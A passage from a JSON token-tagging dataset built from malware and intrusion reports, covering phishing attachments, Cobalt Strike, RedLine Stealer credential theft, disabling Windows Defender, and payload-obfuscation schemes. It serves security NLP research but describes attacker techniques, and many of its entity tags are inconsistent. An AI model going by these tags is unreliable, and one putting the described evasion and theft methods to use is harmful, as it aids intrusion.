"of", - "this", - "intrusion" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "managed", - "to", - "get", - "access", - "to", - "the", - "beachhead", - "host", - "after", - "the", - "successful", - "execution", - "of", - "a", - "lnk", - "file", - "within", - "an", - "ISO,", - "which", - "are", - "usually", - "distributed", - "through", - "email", - "campaigns." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "also", - "created", - "a", - "remote", - "thread", - "in", - "svchost.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Right", - "after", - "its", - "execution,", - "the", - "wab.exe", - "process", - "created", - "two", - "remote", - "threads", - "in", - "order", - "to", - "inject", - "code", - "into", - "explorer.exe", - "and", - "rundll32.exe:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "service", - "account", - "password", - "was", - "weak", - "and", - "cracked", - "offline", - "by", - "threat", - "actors." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Named", - "pipes", - "were", - "created", - "in", - "order", - "to", - "establish", - "communication", - "between", - "CS", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Named", - "piped", - "are", - "commonly", - "used", - "by", - "Cobalt", - "Strike", - "perform", - "various", - "techniques." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "CMD-based", - "scripts" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "CMD-based", - "scripts" - ], - "ner_tags": [ - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "CMD-based", - "scripts" - ], - "ner_tags": [ - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "gets", - "executed", - "via", - "the", - "“SHELLEXECUTE”." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "first", - ".CMD", - "file", - "set", - "seen", - "to", - "use", - "AutoIt", - "in", - "its", - "execution" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Each", - "email", - "has", - "an", - "HTML", - "attachment." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "email", - "text", - "employs", - "scare", - "tactics,", - "such", - "as", - "evidence", - "of", - "a", - "traffic", - "violation,", - "prompting", - "the", - "user", - "to", - "open", - "the", - "HTML", - "attachment" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "prompting", - "the", - "user", - "to", - "open", - "the", - "HTML", - "attachment" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile" - ] - }, - { - "tokens": [ - "contains", - "some", - "junk", - "code", - "and", - "data", - "in", - "HEX", - "format." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "data", - "blob", - "in", - "HEX", - "decodes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "slightly", - "obfuscated", - "URL", - "address" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "two", - "base64", - "encoded", - "data", - "blobs", - "and", - "code", - "instructions", - "for", - "its", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "base64", - "data", - "block", - "execution" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "first", - "base64", - "data", - "blob" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "All", - "data", - "is", - "then", - "sent", - "back", - "to", - "the", - "attacker's", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "the", - "attacker's", - "C2", - "via", - "the", - "HTTP", - "POST", - "method." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "C2", - "is", - "constructed", - "with", - "the", - "victim's", - "enumerated", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "extract", - "sensitive", - "information," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "operating", - "system", - "version" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OS", - "architecture", - "(x86", - "or", - "x64)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keyboard", - "layout" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Opening", - "the", - "attached", - "“multa_de_transito_502323.html”", - "file", - "triggers", - "the", - "embedded", - "JavaScript" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "a", - "“.VBS”", - "file" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "It", - "proceeds", - "by", - "downloading", - "the", - "“sqlite3.dll”", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "to", - "steal", - "Outlook", - "data", - "such", - "as", - "server,", - "user,", - "and", - "password", - "from", - "POP3,", - "SMPT,", - "and", - "IMAP", - "registry", - "keys" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exploiting", - "vulnerable", - "web-facing", - "devices" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrate", - "proprietary", - "or", - "confidential", - "information," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "a", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "starts", - "by", - "decrypting", - "its", - "initial", - "configuration", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "starts", - "its", - "code", - "by", - "decrypting", - "its", - "initial", - "configuration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "code", - "of", - "the", - "decryption", - "algorithm", - "used", - "by", - "RedLine", - "Stealer", - "to", - "decrypt", - "its", - "initial", - "configuration", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "initial", - "configuration", - "data", - "has", - "been", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "decrypt", - "the", - "password", - "stored" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "master", - "key", - "is", - "decrypted," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "decrypt", - "it", - "using", - "AES", - "GCM", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "password" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Try", - "to", - "disable", - "Windows", - "Defender", - "service", - "“WinDefend”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Try", - "to", - "disable", - "Tamper", - "Protection", - "settings", - "of", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Try", - "to", - "Disable", - "AntiSpyware,", - "Real", - "Time", - "Protection", - "and", - "notification", - "of", - "Windows", - "Defender." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Disable", - "Windows", - "update", - "services", - "such", - "as", - "(“wuauserv”,", - "“WaaSMedicSvc”,", - "“UsoSvc”)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Disable", - "Automatic", - "Update", - "and", - "change", - "Windows", - "configurations", - "related", - "to", - "Windows", - "Update" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "is", - "often", - "encoded", - "or", - "encrypted", - "to", - "prevent", - "detection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "combination", - "of", - "Base64", - "and", - "XOR", - "functions." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "master", - "key", - "is", - "encoded", - "with", - "Base64", - "and", - "encrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "grab", - "the", - "encoded", - "and", - "encrypted", - "master", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "will", - "parse", - "the", - "AES", - "IV", - "(Initialization", - "vector)", - "and", - "the", - "encrypted", - "password" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "steal", - "information", - "from", - "the", - "compromised", - "or", - "targeted", - "host" - ], - "ner_tags": [ - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "the", - "ability", - "to", - "collect", - "or", - "extract", - "various", - "types", - "of", - "system", - "information", - "from", - "a", - "targeted", - "or", - "compromised", - "computer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "func_GetHostSerialNumber()" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "host", - "serial", - "number" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Retrieves", - "system", - "default", - "language,", - "timezone", - "and", - "OS", - "version" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Get", - "processor", - "information", - "of", - "the", - "compromised", - "host", - "by", - "executing", - "\"SELECT", - "*", - "FROM", - "Win32_Processor\"" - ], - "ner_tags": [ - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "B-Way", - "B-SecTeam" - ] - }, - { - "tokens": [ - "func_GetProcessor()" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "func_GetLanguageTimeZoneOsVersion()" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "func_GetGraphicCards" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Get", - "AdapterRAM", - "and", - "Graphic", - "Card", - "Name", - "and", - "type", - "by", - "executing", - "\"root\\\\CIMV2\",", - "\"SELECT", - "*", - "FROM", - "Win32_VideoController\"" - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "func_GetTotalRAM()" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Get", - "the", - "total", - "RAM", - "size", - "of", - "compromised", - "host", - "by", - "executing", - "\"SELECT", - "*", - "FROM", - "Win32_OperatingSystem\"", - "and", - "look", - "for", - "\"TotalVisibleMemorySize\"" - ], - "ner_tags": [ - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Retrieve", - "the", - "user", - "domain", - "name,", - "username" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Get", - "the", - "user", - "name", - "of", - "the", - "compromised", - "host" - ], - "ner_tags": [ - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "func_GetUserName()" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Parse", - "firewall", - "and", - "Anti", - "Virus", - "Product", - "install", - "in", - "the", - "compromised", - "host", - "by", - "running", - "\"SELECT", - "*", - "FROM", - "ROOT\\\\SecurityCenter2\"", - "\"SELECT", - "*", - "FROM", - "ROOT\\\\SecurityCenter\"", - "\"SELECT", - "*", - "FROM", - "AntivirusProduct\"", - "\"SELECT", - "*", - "FROM", - "FirewallProduct\"", - "\"SELECT", - "*", - "FROM", - "AntiSpyWareProduct\"" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SecTeam", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "func_GetFirewalls()" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "func_ListProcesses()" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Retrieve", - "process", - "list", - "and", - "process", - "information", - "by", - "running", - "'SELECT", - "*", - "FROM", - "Win32_Process'" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Screen", - "Capture" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "func_ScanScreen()", - "is", - "the", - "one", - "responsible", - "for", - "this", - "screen", - "capture", - "capability" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "has", - "a", - "functionality", - "to", - "capture", - "a", - "screenshot", - "of", - "the", - "targeted", - "or", - "compromised", - "host", - "as", - "part", - "of", - "its", - "data", - "collection", - "and", - "exfiltration" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - ".NET", - "Graphics", - "class", - "CopyFromScreen", - "Function()", - "to", - "transfer", - "a", - "bit", - "block", - "of", - "color", - "data", - "from", - "the", - "screen", - "to", - "the", - "Graphic", - "drawing", - "surface", - "that", - "will", - "be", - "saved", - "in", - "memory", - "stream", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Parse", - "all", - "installed", - "application", - "in", - "the", - "compromised", - "host", - "by", - "querying", - "'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Parse", - "browser", - "application", - "and", - "browser", - "version", - "installed", - "in", - "the", - "compromised", - "host", - "by", - "querying", - "\"SOFTWARE\\WOW6432Node\\Clients\\StartMenuInternet\"", - "or", - "\"SOFTWARE\\Clients\\StartMenuInternet\"", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "uses", - ".NET", - "Graphics", - "class", - "CopyFromScreen", - "Function()" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "using", - "Windows", - "CryptProtectData()", - "API." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cracking", - "browser", - "sensitive", - "information", - "like", - "passwords" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "password", - "will", - "be", - "sent", - "to", - "its", - "C2", - "Server", - "as", - "part", - "of", - "its", - "data", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "enumerates", - "several", - "known", - "Crypto", - "Wallet", - "directories", - "and", - "looks", - "for", - "files", - "related", - "to", - "crypto", - "currencies", - "by", - "looking", - "for", - "files", - "having", - "“wallet”", - "substring", - "on", - "its", - "file", - "name." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "a", - "compiled", - "remote", - "desktop", - "malware," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "executed", - "RDPEnable", - "on", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "There", - "were", - "also", - "instances", - "of", - "the", - "malware", - "actors", - "using", - "PsEXEC", - "to", - "enable", - "the", - "remote", - "desktop", - "protocol", - "(RDP)", - "of", - "a", - "target", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "enumerates", - "files", - "and", - "directories" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "File", - "enumeration" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "FindFirstFileW,", - "FindNextFileW,", - "and", - "FindClose", - "APIs" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "For", - "each", - "directory", - "it", - "traverses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "FindFirstFileW,", - "FindNextFileW,", - "and", - "FindClose", - "APIs" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "installing", - "remote", - "access", - "software." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "actors", - "used", - "tools", - "such", - "as", - "PCHunter,", - "PowerTool,", - "GMER,", - "and", - "Process", - "Hacker", - "to", - "disable", - "any", - "security-related", - "services", - "running", - "in", - "the", - "system." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "listing", - "accessible", - "local", - "IPs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "checks", - "for", - "the", - "number", - "of", - "processors", - "in", - "the", - "infected", - "system" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Checking", - "the", - "number", - "of", - "processors" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "is", - "a", - "multi-stage", - "attack", - "that", - "involves", - "sideloading", - "DLLs," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "involves", - "sideloading", - "DLLs", - "along" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "icon", - "files", - "with", - "encrypted", - "data", - "appended", - "to", - "the", - "end", - "of", - "the", - "files." - ], - "ner_tags": [ - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "encrypted", - "strings," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "once", - "decrypted,", - "contained", - "the", - "C2", - "domains", - "for", - "additional", - "malicious", - "artifacts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attempt", - "to", - "obtain", - "system", - "information" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "attempts", - "to", - "retrieve", - "additional", - "malicious", - "artifacts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Inject", - "and", - "execute", - "DLLs" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Manipulate", - "processes", - "(list" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Manipulate", - "files", - "and", - "directories", - "(list" - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Manipulate", - "files", - "and", - "directories", - "(list,", - "download,", - "upload,", - "view,", - "delete" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "B-HackOrg", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "B-Features" - ] - }, - { - "tokens": [ - "download,", - "upload" - ], - "ner_tags": [ - "B-Features", - "B-Features" - ] - }, - { - "tokens": [ - "Take", - "screenshots" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Execute", - "commands", - "via", - "Command", - "Prompt" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executed", - "using", - "ShellExecute", - "with", - "the", - "following", - "command", - "line:" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "type", - "of", - "threats", - "is", - "usually", - "delivered", - "as", - "email", - "attachments." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Encoded", - "binary", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Encrypted", - "and", - "compressed", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Start", - "of", - "encrypted", - "and", - "compressed", - "loader", - "configuration", - "and", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "encoded", - "payload", - "split", - "across", - "several", - "nodes,", - "further", - "complicating", - "its", - "extraction." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "That", - "node", - "contains", - "the", - "encoded", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encoded", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "hide", - "the", - "strings", - "it", - "uses", - "during", - "its", - "execution,", - "it", - "primarily", - "uses", - "a", - "simple", - "encoding", - "by", - "subtracting", - "35", - "from", - "each", - "character", - "of", - "the", - "original", - "string", - "and", - "encoding", - "the", - "result", - "with", - "Base64" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Similar", - "to", - "decoding", - "strings,", - "the", - "binary", - "payload", - "is", - "extracted", - "by", - "decoding", - "the", - "data", - "using", - "Base64", - "and", - "adding", - "35." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "resulting", - "bytes", - "are", - "further", - "decoded", - "with", - "xor", - "82." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decoded", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "payload", - "is", - "decoded" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "decrypting", - "and", - "decompressing", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decrypted", - "and", - "decompressed", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decodes", - "sensitive", - "memory", - "regions", - "in", - "the", - "current", - "process", - "with", - "the", - "same", - "XOR", - "key" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "locates", - "a", - "packed", - "and", - "compressed", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Injection", - "type:", - "Current", - "process", - "(1)", - "or", - "in", - "the", - "new", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "to", - "inject", - "into" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "to", - "inject", - "into" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "this", - "loader", - "prepends", - "a", - "stub", - "containing", - "79", - "bytes", - "of", - "junk", - "instructions", - "before", - "the", - "actual", - "payload", - "shellcode." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "bytes", - "at", - "25", - "hardcoded", - "offsets", - "within", - "this", - "stub", - "are", - "replaced", - "with", - "random", - "bytes", - "to", - "hinder", - "shellcode", - "detection." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - 